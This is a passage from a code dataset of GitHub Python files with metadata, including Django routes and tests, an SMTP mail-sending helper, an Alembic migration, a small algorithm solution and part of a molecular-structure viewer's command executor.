сторонами существует. {length_type}'\n else:\n return 'Треугольник с такими сторонами не существует'\n\n\nclass Matrix:\n def __init__(self, count_rows: int, count_columns: int):\n self.rows = count_rows\n self.columns = count_columns\n self.matrix = [[random.randint(1, 100) for i in range(self.rows)] for j in range(self.columns)]\n\n def trans_matrix_zip(self):\n return list(zip(*self.matrix))\n\n\nmatrix1 = Matrix(5, 5)\nfor i in matrix1.matrix:\n print(i)\nprint('=======')\nfor i in matrix1.trans_matrix_zip():\n print(i)\n\ntriangle1 = Triangle(10, 10, 8)\ntriangle2 = Triangle(10, 10, 10)\ntriangle3 = Triangle(10, 9, 8)\ntriangle4 = Triangle(10, 10, -8)\nprint(triangle1.check_is_triangle())\nprint(triangle2.check_is_triangle())\nprint(triangle3.check_is_triangle())\nprint(triangle4.check_is_triangle())\n","repo_name":"Ilya-Kolotov/Homework_Advanced_Python","sub_path":"HW_10/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42275359999","text":"'''\r\nCreated on 2019. 1. 27.\r\n\r\n@author: user\r\n'''\r\nfrom django.urls import path\r\nfrom .views import *\r\n\r\napp_name= 'cl'\r\n\r\nurlpatterns = [\r\n #127.0.0.1:8000/cl/signup/\r\n path('signup/', signup, name = 'signup'),\r\n #127.0.0.1:8000/cl/signin/\r\n path('signin/', signin, name = 'signin'),\r\n #127.0.0.1:8000/cl/signout/\r\n path('signout/', signout, name = 'signout'),\r\n ]","repo_name":"jha0534/django1","sub_path":"django1/src/customlogin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10854008001","text":"import smtplib\nimport urllib.parse\nimport email.utils\nimport textwrap\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\nclass MailSender():\n\t_DEFAULT_PORTS = {\n\t\t\"smtp\":\t\t\t25,\n\t\t\"smtps\":\t\t465,\n\t\t\"submission\":\t587,\n\t}\n\n\tdef __init__(self, smtp_uri = \"smtp://127.0.0.1\", use_starttls = True, auth = None, x_mailer = \"https://github.com/johndoe31415/pycommon MailSender\"):\n\t\tself._uri = urllib.parse.urlparse(smtp_uri)\n\t\tassert(self._uri.scheme.lower() in self._DEFAULT_PORTS)\n\t\thostname_port = self._uri.netloc.split(\":\", maxsplit = 1)\n\t\tif len(hostname_port) == 2:\n\t\t\t(self._hostname, self._port) = (hostname_port[0], int(hostname_port[1]))\n\t\telse:\n\t\t\tself._hostname = hostname_port[0]\n\t\t\tself._port = self._DEFAULT_PORTS[self._uri.scheme]\n\t\tself._starttls = use_starttls\n\t\tself._auth = auth\n\t\tself._x_mailer = x_mailer\n\n\t@classmethod\n\tdef wrap_paragraphs(cls, text, width = 72):\n\t\toutput = [ ]\n\t\tfor paragraph in text.split(\"\\n\"):\n\t\t\tif paragraph == \"\":\n\t\t\t\toutput.append(\"\")\n\t\t\telse:\n\t\t\t\toutput += textwrap.wrap(paragraph, width = width)\n\t\treturn \"\\n\".join(output)\n\n\t@staticmethod\n\tdef _format_address(address_input):\n\t\tif isinstance(address_input, str):\n\t\t\treturn address_input\n\t\telse:\n\t\t\treturn email.utils.formataddr(address_input)\n\n\tdef _format_addresses(self, address_input):\n\t\tif isinstance(address_input, str):\n\t\t\treturn [ self._format_address(address_input) ]\n\t\telse:\n\t\t\treturn [ self._format_address(address) for address in address_input ]\n\n\tdef send(self, from_addr, subject, body_text = None, body_html = None, to_addr = None, to_addrs = None, cc_addrs = None, bcc_addrs = None):\n\t\tif (to_addr is None) and (to_addrs is None):\n\t\t\traise ValueError(\"Either 'to_addr' or 'to_addrs' must be specified.\")\n\t\telif (to_addr is not None) and (to_addrs is not None):\n\t\t\traise ValueError(\"Either of 'to_addr' or 'to_addrs' must be specified, not both.\")\n\t\tif (body_text is None) and (body_html is None):\n\t\t\traise ValueError(\"At least one of 'body_text' or 'body_html' must be specified.\")\n\n\t\tif body_html is None:\n\t\t\t# Text only\n\t\t\tmessage = MIMEText(body_text, \"plain\")\n\t\telif body_text is None:\n\t\t\t# HTML only\n\t\t\tmessage = MIMEText(body_html, \"html\")\n\t\telse:\n\t\t\t# Text and HTML\n\t\t\tmessage = MIMEMultipart(\"alternative\")\n\t\t\tmessage.attach(MIMEText(body_text, \"plain\"))\n\t\t\tmessage.attach(MIMEText(body_html, \"html\"))\n\n\t\tfrom_addr = self._format_address(from_addr)\n\t\tif to_addr is not None:\n\t\t\tto_addr = [ self._format_address(to_addr) ]\n\t\telse:\n\t\t\tto_addr = self._format_addresses(to_addrs)\n\t\tmessage[\"From\"] = from_addr\n\t\tmessage[\"To\"] = \", \".join(to_addr)\n\t\tmessage[\"Subject\"] = subject\n\t\tif cc_addrs is not None:\n\t\t\tmessage[\"CC\"] = \", \".join(self._format_addresses(cc_addrs))\n\t\tif bcc_addrs is not None:\n\t\t\tmessage[\"BCC\"] = \", \".join(self._format_addresses(bcc_addrs))\n\t\tmessage[\"Date\"] = email.utils.formatdate(localtime = True)\n\t\tmessage[\"MIME-Version\"] = \"1.0\"\n\t\tif self._x_mailer is not None:\n\t\t\tmessage[\"X-Mailer\"] = self._x_mailer\n\t\tmessage = message.as_string()\n\n\t\tif self._uri.scheme.lower() == \"smtp\":\n\t\t\tconn = smtplib.SMTP(self._hostname, self._port)\n\t\telif self._uri.scheme.lower() == \"smtps\":\n\t\t\tconn = smtplib.SMTP_SSL(self._hostname, self._port)\n\n\t\twith conn as server:\n\t\t\tif self._starttls and (self._uri.scheme.lower() == \"smtp\"):\n\t\t\t\tserver.starttls()\n\n\t\t\tif self._auth is not None:\n\t\t\t\tserver.login(self._auth[0], self._auth[1])\n\n\t\t\temail_from = email.utils.getaddresses([ from_addr ])[0][1]\n\t\t\temail_to = email.utils.getaddresses([ to_addr[0] ])[0][1]\n\t\t\tserver.sendmail(email_from, email_to, message)\n\nif __name__ == \"__main__\":\n\tprint(MailSender.wrap_paragraphs(\"\"\"\\\nTest test testTest test testTest test testTest test testTest test testTest test testTest test testTest test testTest test testTest test testTest test test\n\nJa ja ja ja ja.\n\nTest\n\"\"\"))\n\n\tmail = MailSender()\n\t#mail.send((\"Thäng\", \"thaeng@foo.com\") , to_addr = \"target@x.de\", subject = \"Hey there\", body_text = \"What are you up to?\")\n\t#mail.send((\"Thäng\", \"thaeng@foo.com\") , to_addr = \"target@x.de\", subject = \"Hey there\", body_html = \"What are you up to?\")\n\tmail.send((\"Thäng\", \"thaeng@foo.com\") , to_addr = \"target@x.de\", subject = \"Hey there\", body_text = \"text!\", body_html = \"What are you up to?\")\n","repo_name":"johndoe31415/pycommon","sub_path":"pycommon/MailSender.py","file_name":"MailSender.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29023583487","text":"import pytest\n\nfrom random import random\n\nfrom staff.budget_position.models import BudgetPositionAssignmentStatus, ReplacementType\nfrom staff.budget_position.tests.utils import BudgetPositionAssignmentFactory, RewardFactory\nfrom staff.departments.tests.factories import VacancyFactory\nfrom staff.lib.testing import (\n BudgetPositionFactory,\n DepartmentFactory,\n GeographyDepartmentFactory,\n StaffFactory,\n ValueStreamFactory,\n)\n\nfrom staff.headcounts.budget_position_assignment_filter_context import BudgetPositionAssignmentFilterContext\nfrom staff.headcounts.forms import QUANTITY_FILTER\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_position_statuses():\n status = BudgetPositionAssignmentStatus.MATERNITY.value\n assignment = BudgetPositionAssignmentFactory(status=status)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(position_statuses=[status])\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_replacement_type():\n replacement_type = ReplacementType.WITHOUT_REPLACEMENT.value\n assignment = BudgetPositionAssignmentFactory(replacement_type=replacement_type)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(replacement_type=[replacement_type])\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\n@pytest.mark.parametrize(\n 'category_is_new',\n [\n True,\n False,\n ],\n)\ndef test_positions_objects_qs_filter_by_category_is_new(category_is_new):\n assignment = BudgetPositionAssignmentFactory(creates_new_position=category_is_new)\n BudgetPositionAssignmentFactory(creates_new_position=not category_is_new)\n\n target = BudgetPositionAssignmentFilterContext(category_is_new=category_is_new)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\n@pytest.mark.parametrize(\n 'main_assignment',\n [\n True,\n False,\n ],\n)\ndef test_positions_objects_qs_filter_by_main_assignment(main_assignment):\n assignment = BudgetPositionAssignmentFactory(main_assignment=main_assignment)\n BudgetPositionAssignmentFactory(main_assignment=not main_assignment)\n\n target = BudgetPositionAssignmentFilterContext(main_assignment=main_assignment)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_is_crossing():\n assignment = BudgetPositionAssignmentFactory()\n next_assignment = BudgetPositionAssignmentFactory(previous_assignment=assignment)\n\n target_class = BudgetPositionAssignmentFilterContext\n\n assert target_class(is_crossing=True).positions_objects_qs().get().pk == assignment.pk\n assert target_class(is_crossing=False).positions_objects_qs().get().pk == next_assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_category():\n reward = RewardFactory(category='Mass', name='Mass')\n assignment = BudgetPositionAssignmentFactory(reward=reward)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(category=['Mass'])\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_current_person():\n current_person = StaffFactory()\n assignment = BudgetPositionAssignmentFactory(person=current_person)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(current_person=current_person)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_replaced_person():\n replaced_person = StaffFactory()\n assignment = BudgetPositionAssignmentFactory(\n previous_assignment=BudgetPositionAssignmentFactory(person=replaced_person),\n )\n BudgetPositionAssignmentFactory(previous_assignment=BudgetPositionAssignmentFactory())\n\n target = BudgetPositionAssignmentFilterContext(replaced_person=replaced_person)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_code():\n budget_position = BudgetPositionFactory()\n assignment = BudgetPositionAssignmentFactory(budget_position=budget_position)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(code=budget_position.code)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_codes():\n budget_position = BudgetPositionFactory()\n assignment = BudgetPositionAssignmentFactory(budget_position=budget_position)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(codes=[budget_position.code])\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_department_url():\n department = DepartmentFactory()\n assignment = BudgetPositionAssignmentFactory(department=department)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(department_url=department.url)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_exact_department():\n department = DepartmentFactory()\n assignment = BudgetPositionAssignmentFactory(department=department)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(department=department)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_nested_department():\n department = DepartmentFactory()\n a_nested_department = DepartmentFactory(parent=department)\n assignment = BudgetPositionAssignmentFactory(department=a_nested_department)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(department=department)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_exact_value_stream():\n value_stream = ValueStreamFactory()\n assignment = BudgetPositionAssignmentFactory(value_stream=value_stream)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(value_stream=value_stream)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_nested_value_stream():\n value_stream = ValueStreamFactory()\n a_nested_value_stream = ValueStreamFactory(parent=value_stream)\n assignment = BudgetPositionAssignmentFactory(value_stream=a_nested_value_stream)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(value_stream=value_stream)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_exact_geography():\n geography = GeographyDepartmentFactory()\n assignment = BudgetPositionAssignmentFactory(geography=geography)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(geography=geography)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_nested_geography():\n geography = GeographyDepartmentFactory()\n a_nested_geography = GeographyDepartmentFactory(parent=geography)\n assignment = BudgetPositionAssignmentFactory(geography=a_nested_geography)\n BudgetPositionAssignmentFactory()\n\n target = BudgetPositionAssignmentFilterContext(geography=geography)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\n@pytest.mark.parametrize(\n 'quantity, correct_headcount, wrong_headcount',\n [\n [QUANTITY_FILTER.ZERO, 0, 1],\n [QUANTITY_FILTER.ZERO, 0, -1],\n [QUANTITY_FILTER.GREATER_THAN_ZERO, 1, 0],\n [QUANTITY_FILTER.GREATER_THAN_ZERO, 1, -1],\n [QUANTITY_FILTER.LESS_THAN_ZERO, -1, 0],\n [QUANTITY_FILTER.LESS_THAN_ZERO, -1, 1],\n ],\n)\ndef test_positions_objects_qs_filter_by_quantity(quantity, correct_headcount, wrong_headcount):\n assignment = BudgetPositionAssignmentFactory(budget_position=BudgetPositionFactory(headcount=correct_headcount))\n BudgetPositionAssignmentFactory(budget_position=BudgetPositionFactory(headcount=wrong_headcount))\n\n target = BudgetPositionAssignmentFilterContext(quantity=quantity)\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_qs_default_fields():\n assignment = BudgetPositionAssignmentFactory(person=StaffFactory())\n\n target = BudgetPositionAssignmentFilterContext()\n\n result = target.positions_qs()\n\n assert result.get() == {\n 'budget_position__code': assignment.budget_position.code,\n 'name': assignment.name,\n 'budget_position__headcount': assignment.budget_position.headcount,\n 'change_reason': assignment.change_reason,\n 'creates_new_position': assignment.creates_new_position,\n 'department__id': assignment.department_id,\n 'department__name': assignment.department.name,\n 'department__name_en': assignment.department.name_en,\n 'department__url': assignment.department.url,\n 'department_id': assignment.department_id,\n 'geography__id': assignment.geography.id,\n 'geography__name': assignment.geography.name,\n 'geography__name_en': assignment.geography.name_en,\n 'geography__url': assignment.geography.url,\n 'geography_id': assignment.geography.id,\n 'id': assignment.id,\n 'main_assignment': assignment.main_assignment,\n 'next_assignment__id': None,\n 'previous_assignment_id': None,\n 'person__first_name': assignment.person.first_name,\n 'person__first_name_en': assignment.person.first_name_en,\n 'person__last_name': assignment.person.last_name,\n 'person__last_name_en': assignment.person.last_name_en,\n 'person__login': assignment.person.login,\n 'previous_assignment__person__first_name': None,\n 'previous_assignment__person__first_name_en': None,\n 'previous_assignment__person__last_name': None,\n 'previous_assignment__person__last_name_en': None,\n 'previous_assignment__person__login': None,\n 'replacement_type': str(assignment.replacement_type),\n 'reward_id': assignment.reward.id,\n 'reward__category': assignment.reward.category,\n 'status': assignment.status,\n 'value_stream__id': assignment.value_stream.id,\n 'value_stream__name': assignment.value_stream.name,\n 'value_stream__name_en': assignment.value_stream.name_en,\n 'value_stream__url': assignment.value_stream.url,\n 'value_stream_id': assignment.value_stream.id,\n }\n\n\n@pytest.mark.django_db\n@pytest.mark.parametrize(\n 'exclude_reserve, expected_results',\n [\n [True, 2],\n [False, 3],\n ],\n)\ndef test_positions_quantity_qs_exclude_reserve(exclude_reserve, expected_results):\n department = DepartmentFactory()\n BudgetPositionAssignmentFactory(\n department=department,\n status=BudgetPositionAssignmentStatus.RESERVE.value,\n budget_position=BudgetPositionFactory(headcount=-1)\n )\n BudgetPositionAssignmentFactory(department=department, status=BudgetPositionAssignmentStatus.RESERVE.value)\n BudgetPositionAssignmentFactory(department=department)\n\n target = BudgetPositionAssignmentFilterContext(exclude_reserve=exclude_reserve)\n\n result = target.positions_quantity_qs('department')\n\n assert list(result) == [{'department': department.id, 'qty': expected_results}]\n\n\n@pytest.mark.django_db()\n@pytest.mark.parametrize(\n 'field',\n [\n 'login',\n 'first_name',\n 'last_name',\n 'first_name_en',\n 'last_name_en',\n ],\n)\ndef test_positions_objects_qs_filter_by_search_text_in_person_fields(field):\n generated_text = _get_random_searchable_field_value()\n correct_status = BudgetPositionAssignmentStatus.OCCUPIED\n person = StaffFactory(**{field: generated_text})\n assignment = BudgetPositionAssignmentFactory(person=person, status=correct_status.value)\n BudgetPositionAssignmentFactory()\n\n for status in _get_choices_excluding(BudgetPositionAssignmentStatus, [correct_status]):\n BudgetPositionAssignmentFactory(person=person, status=status)\n\n target = BudgetPositionAssignmentFilterContext(search_text=generated_text[2:])\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\n@pytest.mark.parametrize(\n 'field',\n [\n 'candidate_first_name',\n 'candidate_last_name',\n ],\n)\ndef test_positions_objects_qs_filter_by_search_text_in_offer_fields(field):\n generated_text = _get_random_searchable_field_value()\n correct_status = BudgetPositionAssignmentStatus.OFFER\n vacancy = VacancyFactory(**{field: generated_text, 'is_active': True})\n assignment = BudgetPositionAssignmentFactory(budget_position=vacancy.budget_position, status=correct_status.value)\n BudgetPositionAssignmentFactory()\n\n for status in _get_choices_excluding(BudgetPositionAssignmentStatus, [correct_status]):\n wrong_vacancy = VacancyFactory(**{field: generated_text, 'is_active': True})\n BudgetPositionAssignmentFactory(budget_position=wrong_vacancy.budget_position, status=status)\n\n target = BudgetPositionAssignmentFilterContext(search_text=generated_text[2:])\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\ndef test_positions_objects_qs_filter_by_search_text_in_vacancy_name():\n generated_text = _get_random_searchable_field_value()\n correct_status = BudgetPositionAssignmentStatus.VACANCY_OPEN\n vacancy = VacancyFactory(name=generated_text, is_active=True)\n assignment = BudgetPositionAssignmentFactory(budget_position=vacancy.budget_position, status=correct_status.value)\n BudgetPositionAssignmentFactory()\n\n for status in _get_choices_excluding(BudgetPositionAssignmentStatus, [correct_status]):\n wrong_vacancy = VacancyFactory(name=generated_text, is_active=True)\n BudgetPositionAssignmentFactory(budget_position=wrong_vacancy.budget_position, status=status)\n\n target = BudgetPositionAssignmentFilterContext(search_text=generated_text[2:])\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\n@pytest.mark.django_db()\n@pytest.mark.parametrize(\n 'correct_status',\n [\n BudgetPositionAssignmentStatus.VACANCY_OPEN,\n BudgetPositionAssignmentStatus.OFFER,\n ],\n)\ndef test_positions_objects_qs_filter_by_search_text_in_ticket(correct_status):\n generated_text = _get_random_searchable_field_value()\n correct_statues = [BudgetPositionAssignmentStatus.VACANCY_OPEN, BudgetPositionAssignmentStatus.OFFER]\n vacancy = VacancyFactory(ticket=generated_text, is_active=True)\n assignment = BudgetPositionAssignmentFactory(budget_position=vacancy.budget_position, status=correct_status.value)\n BudgetPositionAssignmentFactory()\n\n for status in _get_choices_excluding(BudgetPositionAssignmentStatus, correct_statues):\n wrong_vacancy = VacancyFactory(ticket=generated_text, is_active=True)\n BudgetPositionAssignmentFactory(budget_position=wrong_vacancy.budget_position, status=status)\n\n target = BudgetPositionAssignmentFilterContext(search_text=generated_text[2:])\n\n result = target.positions_objects_qs()\n\n assert result.get().pk == assignment.pk\n\n\ndef _get_choices_excluding(enum, exclude_choices):\n exclude_values = [choice.value for choice in exclude_choices]\n return (choice[0] for choice in enum.choices() if choice[0] not in exclude_values)\n\n\ndef _get_random_searchable_field_value():\n return f'field-{random()}'\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/budget_position_assignment_filter_context_test.py","file_name":"budget_position_assignment_filter_context_test.py","file_ext":"py","file_size_in_byte":16466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20473291980","text":"\"\"\"added test_result table\n\nRevision ID: 76ca6ff2e9f5\nRevises: 99440584ad9c\nCreate Date: 2022-04-10 10:51:26.189875\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '76ca6ff2e9f5'\ndown_revision = '99440584ad9c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('test_result',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('test_id', sa.Integer(), nullable=True),\n sa.Column('submission_id', sa.Integer(), nullable=True),\n sa.Column('result', sa.String(), nullable=True),\n sa.Column('user_output', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['submission_id'], ['submissions.id'], ),\n sa.ForeignKeyConstraint(['test_id'], ['tests.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('test_result')\n # ### end Alembic commands ###\n","repo_name":"S1riyS/CONTESTER","sub_path":"migrations/versions/76ca6ff2e9f5_added_test_result_table.py","file_name":"76ca6ff2e9f5_added_test_result_table.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"43023925204","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime\n\nfrom pyramid.view import view_config\n\nfrom warehouse.banners.models import Banner\n\n\n@view_config(\n route_name=\"includes.db-banners\",\n renderer=\"includes/banner-messages.html\",\n uses_session=True,\n has_translations=True,\n)\ndef list_banner_messages(request):\n # used to preview specific banner\n banner_id = request.params.get(\"single_banner\")\n if banner_id:\n query = request.db.query(Banner).filter(Banner.id == banner_id)\n else:\n today = datetime.date.today()\n query = request.db.query(Banner).filter(\n (Banner.active == True) & (Banner.end >= today) # noqa\n )\n\n return {\"banners\": query.all()}\n","repo_name":"pypi/warehouse","sub_path":"warehouse/banners/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"29027266097","text":"# -*- coding: utf-8 -*-\nfrom django.test import TestCase\n\nfrom events.surveyme.factories import SurveyQuestionShowConditionNodeItemFactory\nfrom events.surveyme.models import SurveyQuestionShowConditionNodeItem\nfrom events.conditions.factories import ContentTypeAttributeFactory\n\n\nclass TestSurveyQuestionShowConditionNodeItem(TestCase):\n fixtures = ['initial_data.json']\n\n def test_ordering(self):\n content_type_attribute = ContentTypeAttributeFactory()\n SurveyQuestionShowConditionNodeItemFactory(position=3, id=1, content_type_attribute=content_type_attribute)\n SurveyQuestionShowConditionNodeItemFactory(position=2, id=2, content_type_attribute=content_type_attribute)\n SurveyQuestionShowConditionNodeItemFactory(position=1, id=3, content_type_attribute=content_type_attribute)\n response = list(SurveyQuestionShowConditionNodeItem.objects.all().values_list('id', flat=True))\n msg = 'по дефолту SurveyQuestionShowConditionNodeItem должен сортироваться по position'\n self.assertEqual(response, [3, 2, 1], msg)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/surveyme/test_survey_questionshow_condition_node_item_model.py","file_name":"test_survey_questionshow_condition_node_item_model.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71990864083","text":"from collections import deque\n\ndef solution(want, number, discount):\n answer = 0\n \n for i in range(len(discount)-9):\n d_want = dict(zip(want,number))\n q=deque(discount[i:i+10]) \n \n for _ in range(10):\n temp = q.popleft()\n if temp in want and d_want[temp]>0:\n d_want[temp]-=1\n else:\n continue\n \n if sum(d_want.values())==0:\n answer+=1\n \n return answer","repo_name":"da-in/algorithm-study","sub_path":"Programmers - 문제풀이/할인 행사/jiwon.py","file_name":"jiwon.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"26774579484","text":"#!/usr/bin/env python3\n#coding=utf-8\n\n\n# pyqt imports\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\n# my imports\nfrom Structure.LAMMPSFullSystem import LAMMPSFullSystem\nfrom DataIO.ReaderLAMMPSData import ReaderLAMMPSData\nfrom Structure.DrawnSystem import DrawnSystem\nfrom Graphics.DrawingStyle import DrawingStyle\n\n\nclass UserCommandsExecutor:\n \"\"\"\n Transforms the string of commands into the sequence of the function calls.\n \"\"\"\n def __init__(self, atomicWidget, mainWidget):\n self.__aw = atomicWidget\n self.__mw = mainWidget\n\n##### general methods\n def exit(self, exitString):\n print(exitString)\n print('bye!')\n import sys\n sys.exit()\n\n def loadFromFile(self, fname):\n #print('UserCommandExecutor, loading system from file', fname)\n rld = ReaderLAMMPSData(fname=fname, atomicStyle='full')\n lmpFullSystem = LAMMPSFullSystem(method='manual',\n atoms=rld.parsedAtoms(),\n bonds=rld.parsedBonds(),\n angles=rld.parsedAngles(),\n dihedrals=rld.parsedDihedrals(),\n impropers=rld.parsedImpropers(),\n boundaries=rld.parsedBoundaries())\n drawnSystem = DrawnSystem(LAMMPSFullSystem=lmpFullSystem)\n self.__aw.updateProperty('LAMMPSFullSystem', lmpFullSystem)\n self.__aw.updateProperty('drawnSystem', drawnSystem)\n self.__aw.update()\n\n##### methods to manipulate with a displayed picture\n # (not the physical system!)\n def setProjection(self, projection):\n self.__aw.updateProperty('projection', projection)\n\n def setDrawingStyle(self, drawingStyleName):\n drawingStyle = DrawingStyle(drawingStyleName)\n self.__aw.updateProperty('drawingStyle', drawingStyle)\n\n \"\"\"\n def removeTextStringName(self, stringName):\n self.__aw.removeTextStringName(stringName)\n\n def addAtomStringName(self, stringName):\n self.__aw.addAtomStringName(stringName)\n\n def addTextStringName(self, stringName):\n self.__aw.addTextStringName(stringName)\n \"\"\"\n\n def setAtomColor(self, color):\n drawingStyle = self.__aw.getProperty('drawingStyle')\n drawingStyle.updateProperty('atomColor', color)\n drawingStyle.updateProperty('atomColorPolicy', 'common')\n\n def setAtomRadius(self, radius):\n drawingStyle = self.__aw.getProperty('drawingStyle')\n drawingStyle.updateProperty('commonAtomRadius', radius)\n drawingStyle.updateProperty('atomRadiusPolicy', 'common')\n\n def setBondColor(self, color):\n drawingStyle = self.__aw.getProperty('drawingStyle')\n drawingStyle.updateProperty('bondColor', color)\n drawingStyle.updateProperty('bondColorPolicy', 'common')\n\n##### methods to manipulate with the physical system\n def moveAtomsAlongX(self, offsetAlongX):\n system = self.__aw.getProperty('LAMMPSFullSystem')\n if system is not None:\n for lmpAtom in system.getProperty('atoms'):\n lmpAtom.moveAlongXAxis(offsetAlongX)\n else:\n print('ERROR, uce.moveAtomsAlongX:',\n 'physical system is not set',\n 'it is possible to move just image instead of pruposed action')\n return\n drawnSystem = DrawnSystem(LAMMPSFullSystem=system)\n self.__aw.updateProperty('LAMMPSFullSystem', system)\n\n def moveAtomsAlongY(self, offsetAlongY):\n system = self.__aw.getProperty('LAMMPSFullSystem')\n if system is not None:\n for lmpAtom in system.getProperty('atoms'):\n lmpAtom.moveAlongYAxis(offsetAlongY)\n else:\n print('ERROR, uce.moveAtomsAlongY:',\n 'physical system is not set',\n 'it is possible to move just image instead of pruposed action')\n return\n drawnSystem = DrawnSystem(LAMMPSFullSystem=system)\n self.__aw.updateProperty('LAMMPSFullSystem', system)\n\n def moveAtomsAlongZ(self, offsetAlongZ):\n system = self.__aw.getProperty('LAMMPSFullSystem')\n if system is not None:\n for lmpAtom in system.getProperty('atoms'):\n lmpAtom.moveAlongZAxis(offsetAlongZ)\n else:\n print('ERROR, uce.moveAtomsAlongZ:',\n 'physical system is not set',\n 'it is possible to move just image instead of pruposed action')\n return\n drawnSystem = DrawnSystem(LAMMPSFullSystem=system)\n self.__aw.updateProperty('LAMMPSFullSystem', 